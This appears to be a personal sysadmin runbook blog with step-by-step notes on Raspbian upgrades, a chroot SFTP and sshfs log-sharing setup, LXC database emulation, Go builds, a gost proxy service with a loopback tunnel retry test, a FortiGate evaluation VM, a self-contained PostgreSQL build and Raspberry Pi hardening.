upgrade raspbian from buster to bullseye

DESCRIPTION

Upgrade raspbian from buster to bullseye. buster was released in 2019.
pre change: backup files required that are not backed up or documented.

Reference: https://www.tomshardware.com/how-to/upgrade-raspberry-pi-os-to-bullseye-from-buster

COMMANDS

1
2
sudo -i
tmux
1
2
3
4
5
apt update
apt dist-upgrade
apt autoremove
apt autoclean
reboot
1
grep -r buster  /etc/apt/*
1
2
3
4
5
6
7
vi /etc/apt/sources.list
deb http://raspbian.raspberrypi.org/raspbian/ bullseye main contrib non-free rpi
deb-src http://raspbian.raspberrypi.org/raspbian/ bullseye main contrib non-free rpi

vi /etc/apt/sources.list.d/raspi.list
deb http://archive.raspberrypi.org/debian/ bullseye main
deb-src http://archive.raspberrypi.org/debian/ bullseye main
  • when prompted to restart services? Yes

  • keep existing configuration files when prompted:
    ‘keep currently installed version ? Yes or O’

1
2
3
4
5
6
apt update
apt dist-upgrade

apt autoremove
apt autoclean
reboot

ERRORS

If ssh access hangs, and there is no network or ssh access, restart, login via
console and try ‘dpkg –configure -a’
If all fails, re-image bullseye onto sdcard and follow runbook/RFC to setup the
device.
Copy files from backup.

VERIFICATION

1
2
cat /etc/issue
Raspbian GNU/Linux 11 \n \l

access sshfs mount via sftp chroot account

DESCRIPTION

  • setup a basic ssh server/client to share file in read-only mode
  • create a chroot user with sftp only access to access mounted file system

ERRORS

COMMANDS

  • install: on server sharing files

openssh-server - secure shell (SSH) server, for secure access from remote machines

  • install: on client system mounting remote file

sshfs - filesystem client based on SSH File Transfer Protocol
openssh-client - secure shell (SSH) client, for secure access to remote machines

  • mounts are done by unprivileged user, the user must use following to unmount:
1
fusermount -u /home/user/mnt
  • create chroot user
1
2
3
4
5
mkdir /home/this_userlogs
groupadd this_userlogs
useradd -d /home/this_userlogs -M -g this_userlogs -s /bin/rbash this_userlogs
chown root:root /home/this_userlogs
chmod 0755 /home/this_userlogs
  • check user
1
2
3
4
5
id this_userlogs
uid=1016(this_userlogs) gid=1001(this_userlogs) groups=1001(this_userlogs)

grep this_userlogs /etc/passwd
this_userlogs:x:1016:1001::/home/this_userlogs:/bin/sh
  • create folder structure to hold files
1
2
3
4
5
6
7
8
9
10
11
12
13
14
mkdir /home/this_useruser /home/this_useruser/.ssh /home/this_useruser/bin
chown -R this_useruser:root /home/this_useruser
chmod 0500 /home/this_useruser
chmod 0700 /home/this_useruser/.ssh

mkdir /home/this_userlogs/app1_logs
mkdir /home/this_userlogs/app2_logs
mkdir /home/this_userlogs/app3_logs
chown this_userlogs:root /home/this_userlogs/app1_logs
chown this_userlogs:root /home/this_userlogs/app2_logs
chown this_userlogs:root /home/this_userlogs/app3_logs
chmod 0700 /home/this_userlogs/app1_logs
chmod 0700 /home/this_userlogs/app2_logs
chmod 0700 /home/this_userlogs/app3_logs
  • create the mount scripts and ssh keys
1
2
su - this_userlogs
cd /home/this_useruser/bin
  • sshfs mount scripts

  • app1-logs

1
2
3
4
5
6
7
8
9
10
11
12
13
14
#! /bin/bash
set -o pipefail
set -o nounset
set -o errexit

PATH=/bin:/usr/bin

LDIR="/home/this_userlogs/app1_logs"
RDIR="/opt/MGW/app1/logs"

COMM="this_userlogs@x.x.x.x"
ARG="-o ro,reconnect,ServerAliveInterval=15,ServerAliveCountMax=3 -o IdentityFile=/home/this_useruser/.ssh/id_rsa -o StrictHostKeyChecking=no"

mount | grep "${LDIR}" >/dev/null 2>&1 ||sshfs ${ARG} ${COMM}:${RDIR} ${LDIR}
  • app2-logs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
#! /bin/bash
set -o pipefail
set -o nounset
set -o errexit

PATH=/bin:/usr/bin

LDIR="/home/this_userlogs/app2_logs"
RDIR="/opt/MGW/app2/apache-tomcat-9.0.54/logs"

COMM="this_userlogs@x.x.x.x"
ARG="-o ro,reconnect,ServerAliveInterval=15,ServerAliveCountMax=3 -o IdentityFile=/home/this_useruser/.ssh/id_rsa -o StrictHostKeyChecking=no"

mount | grep "${LDIR}" >/dev/null 2>&1 ||sshfs ${ARG} ${COMM}:${RDIR} ${LDIR}
  • app3-logs
1
2
3
4
5
6
7
8
9
10
11
12
13
#! /bin/bash
set -o pipefail
set -o nounset
set -o errexit

PATH=/bin:/usr/bin
LDIR="/home/this_userlogs/app3_logs"
RDIR="/opt/MGW/app1/remoteStorage"

COMM="this_userlogs@x.x.x.x"
ARG="-o ro,reconnect,ServerAliveInterval=15,ServerAliveCountMax=3 -o IdentityFile=/home/this_useruser/.ssh/id_rsa -o StrictHostKeyChecking=no"

mount | grep "${LDIR}" >/dev/null 2>&1 ||sshfs ${ARG} ${COMM}:${RDIR} ${LDIR}
  • /usr/local/bin/mount-logs-this_useruser
1
2
3
4
5
6
7
8
9
10
11
12
13
14
#! /bin/bash
set -o pipefail
set -o errexit
set -o nounset

nc -w 20 -v -z x.x.x.x 22 >/dev/null 2>&1 || exit

if [ $(id -n -u) != "this_userlogs" ]; then
exit 1
fi

/home/this_useruser/bin/app1-logs
/home/this_useruser/bin/app2-logs
/home/this_useruser/bin/app3-logs
  • /etc/cron.d/mount-logs-this_useruser
1
2
@reboot     this_userlogs /usr/local/bin/mount-logs-this_useruser
*/8 * * * * this_userlogs /usr/local/bin/mount-logs-this_useruser
  • ssh keys
1
2
3
su - this_userlogs
cd /home/this_useruser/.ssh
ssh-keygen -f id_rsa

Copy .ssh/id_rsa.pub to rs01 server under appropriate user keys -
app1_user & app2_user

  • Add to end of: /etc/ssh/sshd_config
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# override default of no subsystems
# Subsystem sftp /usr/lib/openssh/sftp-server
Subsystem sftp internal-sftp

Match User this_userlogs
ChrootDirectory %h
ForceCommand internal-sftp
AllowTCPForwarding no
X11Forwarding no

## access the system cannot be restricted to sftp command or rbash, as folder
## traversing is required
#Match User app1_user
# ChrootDirectory %h
# ForceCommand internal-sftp
# AllowTCPForwarding no
# X11Forwarding no
  • check sshd: /usr/sbin/sshd -t

VERIFICATION

1
2
3
4
5
6
7
8
9
10
11
12
sftp this_userlogs@y.y.y.y
Connected to y.y.y.y
sftp> cd /etc
Couldn't stat remote file: No such file or directory
sftp> ls
app1_logs app2_logs app3_logs
sftp> cd app2_logs/
sftp> ls
sftp> put /etc/hosts
Uploading /etc/hosts to /app2_logs/hosts
remote open("/app2_logs/hosts"): Failure
sftp>

emulate primary secondary databases using linux containers

DESCRIPTION

Attempt to emulate production databases using linux containers.
Can be used to test database take-over, replication settings, performance,
etc…

ERRORS

VERIFICATION

COMMANDS

1
2
3
4
5
6
7
8
9
sudo apt install lxc lxc-templates lxc-utils cgroup-tools

sudo lxc-create -n db1 -t ubuntu -- -r focal -u test --password welcome
sudo lxc-create -n db2 -t ubuntu -- -r focal -u test --password welcome

set memory limit on container

cgroup settings will not work unless lxcfs is installed.

sudo apt install lxcfs

1
2
3

<https://github.com/lxc/lxc/issues/2845>

Hi, after install lxcfs, the free command in lxc container show the correct memory now,
Thanks.

https://serverfault.com/questions/762598/will-linux-ubuntu-running-in-an-lxc-container-understand-cgroup-memory-limits

1
2
3
4
5
6
7
8
9

In PRD a database node - KVM - is allocated 1 CPU and 2 GB RAM.
Options: Create a KVM with 1 CPU and 2GB RAM or run container with memory and
CPU restriction.

Emulate containers with 1 CPU and 512MB RAM.

Testing

sudo lxc-cgroup -n db1 memory.soft_limit_in_bytes 536870912
sudo lxc-cgroup -n db1 memory.limit_in_bytes 536870912

sudo lxc-cgroup -n db1 cpuset.cpus 0

1
2
3

Permanent

sudo vi /var/lib/lxc/db1/config


lxc.cgroup.memory.limit_in_bytes = 536870912
lxc.cgroup.memory.max_usage_in_bytes = 536870912

lxc.cgroup.cpuset.cpus = 0

1
2
3

Start the containers

sudo lxc-start -n db1 # 10.0.3.11
sudo lxc-start -n db2 # 10.0.3.111


golang setup and testing

DESCRIPTION

Go and Reproducible Builds

Install the Go compiler and write a few small programs to get familiar
with the language.

The build output should be byte for byte reproducible from the inputs so
we can recreate binaries and trace their provenance.

COMMANDS

Install asdf

sudo apt install –no-install-recommends git curl

1
2
3
4
5
6
git clone https://github.com/asdf-vm/asdf.git ~/.asdf
echo -e '\n. $HOME/.asdf/asdf.sh' >> ~/.profile
echo -e '\n. $HOME/.asdf/completions/asdf.bash' >> ~/.profile
. ~/.profile

asdf

Install the Go Compiler

1
2
3
4
5
6
7
8
9
10
asdf plugin add golang
asdf list-all golang
asdf install golang 1.17.4

asdf global golang 1.17.4
asdf local golang 1.17.4

asdf plugin add golangci-lint
asdf list-all golangci-lint
asdf install golangci-lint 1.43.0

Write a Test Program

1
2
3
mkdir test
cd test
go mod init test
  • In an editor, create main.go:
1
vi main.go
  • With contents:
1
2
3
4
5
6
7
8
9
10
package main

import (
"fmt"
"os"
)

func main() {
fmt.Fprintln(os.Stderr, "test")
}
  • Initialize a git repository
1
2
3
4
5
6
7
git init

# add .gitignore from: https://github.com/github/gitignore/blob/master/Go.gitignore
git add .

# sign your commits
git commit -S
  • Ensure the files are properly formatted:
1
2
go fmt main.go
git diff
  • Compile the program
1
go build
  • Run the program
1
./test
  • Compile the program as a reproducible build: investigate the differences
    between the binaries

  • CGO_ENABLED: disable use of libc, use pure go

  • -trimpath: remove paths from stacktraces

  • -ldflags: reduce binary size by removing debug tables

1
CGO_ENABLED=0 go build -trimpath -ldflags "-s -w"
  • Run the linters
1
2
3
golangci-lint run

golangci-lint run --enable-all

Programs

Write the following programs. We can review during the meeting.

  1. env(1)

    Create a program which lists environment variables as ‘=’ delimited
    key/value pairs:

1
2
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
HOSTNAME=e6a0557d8a1b
  1. ip(1)

    Create a program which lists information about network interfaces:

    • interface name
    • MAC address
    • IP addresses
1
2
{Index:1 MTU:65536 Name:lo HardwareAddr: Flags:up|loopback}
[127.0.0.1/32]

ERRORS

VERIFICATION

gost proxy on raspberry-pi

DESCRIPTION

web proxy for ubuntu.
no caching.
no filtering.

ERRORS

VERIFICATION

COMMANDS

System changes

gost proxy: Compile using go

1
2
3
4
5
git clone https://github.com/ginuerzh/gost.git
cd gost/cmd/gost
env GOOS=linux GOARCH=arm CGO_ENABLED=0 go build -trimpath -ldflags "-s -w"
sftp sba161
put gost

setup to start as a systemd service

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
cat /lib/systemd/system/gostproxy.service

[Unit]
Description=gostproxy
After=network.target

[Service]
ExecStart=gost -L=:8080
User=_gostproxy
Restart=always
KillMode=process
#Hardening

PrivateTmp=true

#CapabilityBoundingSet=CAP_SETGID CAP_SETUID CAP_NET_BIND_SERVICE
#AmbientCapabilities=CAP_NET_BIND_SERVICE
#SecureBits=noroot-locked

ProtectSystem=strict
ProtectHome=true
ProtectKernelModules=true
ProtectKernelTunables=true
ProtectControlGroups=true
MountFlags=private
NoNewPrivileges=true
PrivateDevices=true
RestrictAddressFamilies=AF_INET AF_INET6

MemoryDenyWriteExecute=true
#DynamicUser=true

[Install]
WantedBy=multi-user.target
1
cp  /lib/systemd/system/gostproxy.service  /etc/systemd/system/
1
useradd -s /usr/sbin/nologin _gostproxy -d /run/_gostproxy
1
2
3
4
systemctl daemon-reload
systemctl start gostproxy
systemctl status gostproxy
systemctl enable gostpro

testing gost tunnels retry parameter

DESCRIPTION

gost: getting started

1
Retries - The number of retries after a failed connection through the proxy chain.

gost: code: chain.go

1
2
3
4
5
6
7
8
9
10
func (c *Chain) DialContext(ctx context.Context, network, address string, opts ...ChainOption) (conn net.Conn, err error) {
..
..
for i := 0; i < retries; i++ {
conn, err = c.dialWithOptions(ctx, network, address, options)
if err == nil {
break
}
}
..

Test the ‘retry’ parameter on tunnels with a single or multiple failing chain
node.

Observations:

When using default ‘Retries 1’, a single failing node will result in 1st attempt
always failing. 2nd attempt works.
When ‘Retries’ is set to 2, a single failing node in a chain leg will not fail
on 1st attempt.

The script below will create a test environment as follows.

Backend echo server - 127.0.0.200:9000
Backend terminating gost tunnel end point for server.

2 legs - chain nodes - 127.1.0.x and 127.2.0.x
Can be considered as site 1 and site 2 networks.

Clients: gost terminating end - port 127.0.0.100:9000
Client test: Using netcat to connect to backend server.

ERRORS

VERIFICATION

Create folder
Run script.
Script will create all scripts required to run tests.

Testing:

1
2
3
mkdir /tmp/t
cd /tmp/t
create-gost-tunnel-test-env
  • console 1 - start backend server and all chain nodes (both legs)
1
2
cd /tmp/t
./start-srv-backend-and-chains
  • console 2 - start client end point
1
2
cd /tmp/t
./start-client
  • console 3 - run basic test - all chain nodes are up
1
2
cd /tmp/t
./client-test
  • Failing chain node tests
  • One chain node failing, retry - defaults to 1
1
2
cd /tmp/t
./start-client-leg-1-node-1-fail
  • 1st attempt always fails, 2nd attempt works
1
2
cd /tmp/t
./client-test
  • One chain node failing, retry set to 2
1
2
cd /tmp/t
./start-client-leg-1-node-1-fail-retry-2
  • 1st attempt always does not fails
1
2
cd /tmp/t
./client-test
  • See other 2 tests for further testing
  • Other tests could be added

COMMANDS

  • create-gost-tunnel-test-env
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
#! /bin/bash

rm -rf service client
mkdir service

for i in $(seq 8); do
mkdir service/$i
done

for i in 1 2 3 4; do
cat >service/$i/run <<EOF
#! /bin/bash
exec gost -L=127.1.0.$i:8443
EOF
done

for i in 5 6 7 8; do
cat >service/$i/run <<EOF
#! /bin/bash
exec gost -L=127.2.0.$i:8443
EOF
done

for i in 1 2 3 4 5 6 7 8; do
chmod +x service/$i/run
done

mkdir service/srv
cat >service/srv/run<<EOF
#! /bin/bash
exec nc -vlk 127.0.0.100 9000
EOF

mkdir service/srv_end
cat >service/srv_end/run<<EOF
#! /bin/bash
exec gost -L 127.0.0.100:8443
EOF

chmod +x service/srv_end/run
chmod +x service/srv/run

mkdir client
cat >client/aok.json<<EOF
{
"Debug": false,
"Routes": [
{
"Retries": 1,
"ServeNodes": [
"tcp://127.0.0.200:9000/127.0.0.100:9000"
],
"ChainNodes": [
"socks5://127.1.0.1:8443?ip=127.1.0.1:8443,127.1.0.2:8443",
"socks5://127.2.0.5:8443?ip=127.2.0.5:8443,127.2.0.6:8443",
"socks5://127.0.0.100:8443"
]
}
]
}
EOF

cat >start-client<<EOF
#! /bin/bash
gost -C client/aok.json
EOF
chmod +x start-client

cat >start-srv-backend-and-chains<<EOF
#! /bin/bash
svscan service
EOF
chmod +x start-srv-backend-and-chains

cat >client-test<<EOF
#! /bin/bash
nc -v 127.0.0.200 9000
EOF
chmod +x client-test

###############################################################################
# simulate mutations to chainnodes
# options: use svc -d
# or restart client with rogue (non-existent chain nodes)
# run client tests again
###############################################################################

# Retries = 1, leg 1, node 1 - fail (add a non-existing node - 127.1.0.11)

cat >client/leg-1-node-1-fail.json<<EOF
{
"Debug": false,
"Routes": [
{
"Retries": 1,
"ServeNodes": [
"tcp://127.0.0.200:9000/127.0.0.100:9000"
],
"ChainNodes": [
"socks5://127.1.0.1:8443?ip=127.1.0.11:8443,127.1.0.2:8443",
"socks5://127.2.0.5:8443?ip=127.2.0.5:8443,127.2.0.6:8443",
"socks5://127.0.0.100:8443"
]
}
]
}
EOF

cat >start-client-leg-1-node-1-fail<<EOF
#! /bin/bash
gost -C client/leg-1-node-1-fail.json
EOF
chmod +x start-client-leg-1-node-1-fail

# Retries = 1, leg 1, node 1, leg 2, node 2 - fail (add a non-existing node in each leg)

cat >client/leg-1-node-1-leg-2-node-2-fail.json<<EOF
{
"Debug": false,
"Routes": [
{
"Retries": 1,
"ServeNodes": [
"tcp://127.0.0.200:9000/127.0.0.100:9000"
],
"ChainNodes": [
"socks5://127.1.0.1:8443?ip=127.1.0.11:8443,127.1.0.2:8443",
"socks5://127.2.0.5:8443?ip=127.2.0.5:8443,127.2.0.66:8443",
"socks5://127.0.0.100:8443"
]
}
]
}
EOF

cat >start-client-leg-1-node-1-leg-2-node-2-fail<<EOF
#! /bin/bash
gost -C client/leg-1-node-1-leg-2-node-2-fail.json
EOF
chmod +x start-client-leg-1-node-1-leg-2-node-2-fail

# Retries = 2, leg 1, node 1 - fail

cat >client/leg-1-node-1-fail-retry-2.json<<EOF
{
"Debug": false,
"Routes": [
{
"Retries": 2,
"ServeNodes": [
"tcp://127.0.0.200:9000/127.0.0.100:9000"
],
"ChainNodes": [
"socks5://127.1.0.1:8443?ip=127.1.0.11:8443,127.1.0.2:8443",
"socks5://127.2.0.5:8443?ip=127.2.0.5:8443,127.2.0.6:8443",
"socks5://127.0.0.100:8443"
]
}
]
}
EOF

cat >start-client-leg-1-node-1-fail-retry-2<<EOF
#! /bin/bash
gost -C client/leg-1-node-1-fail-retry-2.json
EOF
chmod +x start-client-leg-1-node-1-fail-retry-2

# Retries = 2, leg 1, node 1, leg 2, node 2 - fail

cat >client/leg-1-node-1-leg-2-node-2-fail-retry-2.json<<EOF
{
"Debug": false,
"Routes": [
{
"Retries": 2,
"ServeNodes": [
"tcp://127.0.0.200:9000/127.0.0.100:9000"
],
"ChainNodes": [
"socks5://127.1.0.1:8443?ip=127.1.0.11:8443,127.1.0.2:8443",
"socks5://127.2.0.5:8443?ip=127.2.0.5:8443,127.2.0.66:8443",
"socks5://127.0.0.100:8443"
]
}
]
}
EOF

cat >start-client-leg-1-node-1-leg-2-node-2-fail-retry-2<<EOF
#! /bin/bash
gost -C client/leg-1-node-1-leg-2-node-2-fail-retry-2.json
EOF
chmod +x start-client-leg-1-node-1-leg-2-node-2-fail-retry-2

# Retries = 1, leg 1, node 1, leg 2, node 2 - fail - have 2 additional working chain nodes per leg

cat >client/leg-1-node-1-leg-2-node-2-fail-additional-2.json<<EOF
{
"Debug": false,
"Routes": [
{
"Retries": 1,
"ServeNodes": [
"tcp://127.0.0.200:9000/127.0.0.100:9000"
],
"ChainNodes": [
"socks5://127.1.0.1:8443?ip=127.1.0.11:8443,127.1.0.2:8443,127.1.0.3:8443,127.1.0.4:8443",
"socks5://127.2.0.5:8443?ip=127.2.0.5:8443,127.2.0.66:8443,127.2.0.7:8443,127.2.0.8:8443",
"socks5://127.0.0.100:8443"
]
}
]
}
EOF

cat >start-client-leg-1-node-1-leg-2-node-2-fail-additional-2<<EOF
#! /bin/bash
gost -C client/leg-1-node-1-leg-2-node-2-fail-additional-2.json
EOF
chmod +x start-client-leg-1-node-1-leg-2-node-2-fail-additional-2

# Retries = 2, leg 1, node 1, leg 2, node 2 - fail - have 2 additional working chain nodes per leg

cat >client/leg-1-node-1-leg-2-node-2-fail-additional-2-retry-2.json<<EOF
{
"Debug": false,
"Routes": [
{
"Retries": 2,
"ServeNodes": [
"tcp://127.0.0.200:9000/127.0.0.100:9000"
],
"ChainNodes": [
"socks5://127.1.0.1:8443?ip=127.1.0.11:8443,127.1.0.2:8443,127.1.0.3:8443,127.1.0.4:8443",
"socks5://127.2.0.5:8443?ip=127.2.0.5:8443,127.2.0.66:8443,127.2.0.7:8443,127.2.0.8:8443",
"socks5://127.0.0.100:8443"
]
}
]
}
EOF

cat >start-client-leg-1-node-1-leg-2-node-2-fail-additional-2-retry-2<<EOF
#! /bin/bash
gost -C client/leg-1-node-1-leg-2-node-2-fail-additional-2-retry-2.json
EOF
chmod +x start-client-leg-1-node-1-leg-2-node-2-fail-additional-2-retry-2

References

fortigate evaluation virtual machine setup

DESCRIPTION

Register and download image from
https://support.fortinet.com/Download/VMImages.aspx

select product - fortigate
select platform - KVM

latest version - 6.4.3 (2020-12-10)

New deployment of FortiGate for KVM

1
FGT_VM64_KVM-v6-build1778-FORTINET.out.kvm.zip (66.86 MB)

Evaliation - 15 days per install.

Install KVM - kernel virtual machine - software on Ubuntu

https://help.ubuntu.com/community/KVM/Installation

COMMANDS

1
2
3
4
5
6
cp FGT_VM64_KVM-v6-build1778-FORTINET.out.kvm.zip /tmp
cd /tmp
unzip FGT_VM64_KVM-v6-build1778-FORTINET.out.kvm.zip
sudo mv fortios.qcow2 /var/lib/libvirt/images/

sudo virt-manager

File -> New Virtual Machine -> Install existing disk image (last option)

Select - /var/lib/libvirt/images/fortios.qcow2

Forward
Forward (Memory/CPUs) - use defaults (see below)

1
Name - FGT_VM64_KVM-v6-build1778-FORTINET

Finish

Click the VM display and you should see a console.

Default login:

admin
NOPASSWORD - enter

Set a password

Failure: setting up a management IP

1
2
3
4
5
6
config system interface
edit port1
set mode static
set ip 192.168.0.100 255.255.255.0
next
end

ERRORS

on ‘next’

1
2
Attribute 'vdom' MUST be set.
Command fail. Return code 1

Steps to avoid this error and get a management IP

Pitfalls: Undocumented

  • ‘set vdom “root”‘ - to avoid
1
2
Attribute 'vdom' MUST be set.
Command fail. Return code 1
  • ‘set type aggregate’ to avoid
1
2
"Attribute 'interface' MUST be set.
Command fail. Return code 1"
1
2
3
4
5
6
7
8
9
config system interface
edit "port1"
set vdom "root"
set mode static
set ip 192.168.0.100 255.255.255.0
set allowaccess ping ssh http
set type aggregate
next
end
  • Ensure the DNS servers are set to bogus values - the VM will attempt to reach
    fortinet and update
1
2
3
4
config system dns
set primary 192.168.0.66
set secondary 192.168.0.67
end
1
2
3
4
5
6
config router static
edit 1
set gateway 192.168.0.1
set device "port1"
next
end

Important notes:

  • Will fail if these settings are not correct
  • License is for 1 cpu and that memory limit when initializing the VM
  • No https management GUI (http only)

Documented

Memory 1024MB
Single CPU

Undocumented

Ensure the libvirt-manager has the network interface set to ‘virtio’ for the VM

VDOM creation: Limited to split VDOM due to evaluation license

1
2
3
config system global
set vdom-mode multi-vdom
end
1
2
3
4
5
6
7
8
FortiGate-VM64-KVM # config system global

FortiGate-VM64-KVM (global) # set vdom-mode multi-vdom
multi-vdom mode cannot be enabled with the current vdom license.
node_check_object fail! for vdom-mode multi-vdom

value parse error before 'multi-vdom'
Command fail. Return code -651

Option to use in evaluation copy: Use split task VDOM

1
2
3
config system global
set vdom-mode split-vdom
end
  • Mesaage:
1
2
3
Some settings (e.g., firewall policy/object, security profile, wifi/switch controller, user, device, dashboard)
in vdom "root" will be deleted, a split-task vdom "FG-traffic" will be created, and you will be logged out for the operation to take effect.
Do you want to continue? (y/n)

This will cause you to log into the new split non-root VDOM and the ‘config system’
command set command set will not be available.
(https://forum.fortinet.com/tm.aspx?m=180832)

1
2
3
4
5
ssh admin@192.168.1.1

config system global
8258: Unknown action 3
Command fail. Return code -1

VERIFICATION

References

https://docs.fortinet.com/document/fortigate/6.4.0/fortigate-virtualization -> virtualization
https://docs.fortinet.com/vm -> External link to PDF
https://docs.fortinet.com/vm/kvm/fortigate/6.4/kvm-cookbook/6.4.0/388201/deployment

Then initial settings and configuring Port1
https://docs.fortinet.com/vm/kvm/fortigate/6.4/kvm-cookbook/6.4.0/615472/configuring-port-1

https://docs.fortinet.com/document/fortigate/6.4.4/administration-guide/498634/using-the-cli

https://docs.fortinet.com/document/fortigate/6.4.0/administration-guide/575766/multi-vdom-configuration-examples
https://docs.fortinet.com/document/fortigate/6.2.3/cookbook/758820/split-task-vdom-mode

self contained postgresql 9.5

DESCRIPTION

compiled and package postgresql 9.5

ERRORS

VERIFICATION

Compare database backups:before and after.

COMMANDS

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
#! /bin/bash
set -o pipefail
set -o nounset
set -o errexit

rm -rf /tmp/build
mkdir /tmp/build
rm -rf /tmp/bin
mkdir /tmp/bin

cd /tmp/build
wget https://www.openssl.org/source/openssl-1.0.2n.tar.gz
tar xzf openssl-1.0.2n.tar.gz
cd openssl-1.0.2n
./config --prefix=/tmp/bin/openssl -fPIC -shared
make
make install

cd /tmp/build
apt source libreadline-dev
cd readline6-6.3
./configure --prefix=/tmp/bin/libreadline
make
make install

cd /tmp/build
apt-get source postgresql-9.5
cd postgresql-9.5-9.5.25/
apt-get source postgresql-9.5
cd postgresql-9.5-9.5.25/
CFLAGS="-Wl,-rpath=/tmp/bin/openssl/lib,-rpath=/tmp/bin/libreadline/lib" \
./configure --prefix=/tmp/bin/pgsql \
--with-openssl \
--with-includes=/tmp/bin/openssl/include:/tmp/bin/libreadline/include \
--with-libraries=/tmp/bin/openssl/lib:/tmp/bin/libreadline/lib
make
make install
cp /lib/x86_64-linux-gnu/libtinfo.so.5 /tmp/bin/pgsql/lib

cd contrib
make
make install

cd /tmp/build
git clone https://github.com/Tarsnap/spiped.git
cd spiped/
CFLAGS="-I/tmp/bin/openssl/include -I/tmp/bin/libreadline/include" \
LDFLAGS="-L/tmp/bin/openssl/lib -L/tmp/bin/libreadline/lib" \
make

#md5sum /lib/x86_64-linux-gnu/libcrypto.so.1.0.0 /tmp/bin/lib/libcrypto.so.1.0.0
#f6cf59390dd79203fd2122a6d15ec0a5 /lib/x86_64-linux-gnu/libcrypto.so.1.0.0
#f6cf59390dd79203fd2122a6d15ec0a5 /tmp/bin/lib/libcrypto.so.1.0.0

mkdir /tmp/bin/lib
cp /lib/x86_64-linux-gnu/libcrypto.so.1.0.0 /tmp/bin/lib/

tar -czf /tmp/pg95.tgz /tmp/bin

Monitoring

raspberry pi base setup

DESCRIPTION

Configuration changes to make on new raspberry pi - raspbian systems.

ERRORS

VERIFICATION

COMMANDS

System changes

  • Disable unused services that are enable by default
1
2
3
systemctl disable hciuart.service
systemctl disable bluealsa.service
systemctl disable bluetooth.service
  • Add to section [all] in /boot/config.txt
  • dtoverlay=disable-bt
1
2
3
4
5
grep disable-bt /boot/overlays/README
Name: disable-bt
Load: dtoverlay=disable-bt
Name: pi3-disable-bt
Info: This overlay has been renamed disable-bt, keeping pi3-disable-bt as an
  • disable wifi
  • Add to section [all] in /boot/config.txt
  • dtoverlay=disable-wifi
1
2
3
4
5
grep disable-wifi /boot/overlays/README
Name: disable-wifi
Load: dtoverlay=disable-wifi
Name: pi3-disable-wifi
Info: This overlay has been renamed disable-wifi, keeping pi3-disable-wifi as
1
2
systemctl disable avahi-daemon.service
systemctl stop avahi-daemon.service

FIXME:

1
systemctl disable wpa_supplicant
  • Had to move hook to disable wpa_supplicant process on reboots
1
mv /lib/dhcpcd/dhcpcd-hooks/10-wpa_supplicant /root 
  • Ignore recommends/suggests when installing software

  • /etc/apt/apt.conf

1
2
3
4
5
6
APT::Install-Recommends "0";
APT::Install-Suggests "0";
Dpkg::Options {
"--force-confdef";
"--force-confold";
}
  • System Update and upgrade
1
2
apt update
apt dist-upgrade
  • sysctl settings

  • /etc/sysctl.d/90-vm-disable-oom-killer.conf

1
2
3
# Disable OOM killer
vm.overcommit_memory=2
vm.overcommit_ratio=90
  • /etc/sysctl.d/90-disable-perf-event.conf
1
2
3
4
5
6
7
8
9
# -1: Allow use of (almost) all events by all users
# >=0: Disallow raw tracepoint access by users without CAP_IOC_LOCK
# >=1: Disallow CPU event access by users without CAP_SYS_ADMIN
# >=2: Disallow kernel profiling by users without CAP_SYS_ADMIN
# >=3: Disallow all event access by users without CAP_SYS_ADMIN
#
# https://lwn.net/Articles/696216/
#
kernel.perf_event_paranoid=3
  • /etc/sysctl.d/90-coredumps-restricted-directory.conf
1
kernel.core_pattern = /var/core/core_%h_%e_%u_%g_%t_%p
1
mkdir /var/core
  • Default profile

  • /etc/profile.d/login.sh

1
2
3
4
export EDITOR=vi
set -o vi
export TMOUT=900
readonly TMOUT
  • /etc/hosts
1
2
3
4
127.0.0.1       localhost
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
  • Install editor
1
apt install vim-nox
  • vim for root

  • root/.vimrc

1
syntax on
  • Install autoupdates for patch management
1
2
apt install unattended-upgrades
dpkg-reconfigure unattended-upgrades
  • change in /etc/apt/apt.conf.d/50unattended-upgrades
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
Unattended-Upgrade::Origins-Pattern {
"origin=Debian,codename=${distro_codename},label=debian";
"origin=Debian,codename=${distro_codename},label=Debian-Security";

"origin=Raspbian,codename=${distro_codename},label=Raspbian";
"origin=Raspberry Pi Foundation,codename=${distro_codename},label=Raspberry Pi Foundation";
};

Unattended-Upgrade::Package-Blacklist {
};

Unattended-Upgrade::AutoFixInterruptedDpkg "true";
Unattended-Upgrade::MinimalSteps "true";
Unattended-Upgrade::InstallOnShutdown "false";
Unattended-Upgrade::Remove-Unused-Kernel-Packages "true";
Unattended-Upgrade::Remove-New-Unused-Dependencies "true";
Unattended-Upgrade::Remove-Unused-Dependencies "true";
Unattended-Upgrade::Automatic-Reboot "true";
Unattended-Upgrade::Automatic-Reboot-WithUsers "true";
Unattended-Upgrade::Automatic-Reboot-Time "02:00";

systemctl status unattended-upgrades
systemctl enable unattended-upgrades

user management

  • Remove user pi
1
2
userdel pi
rm -rf /home/pi
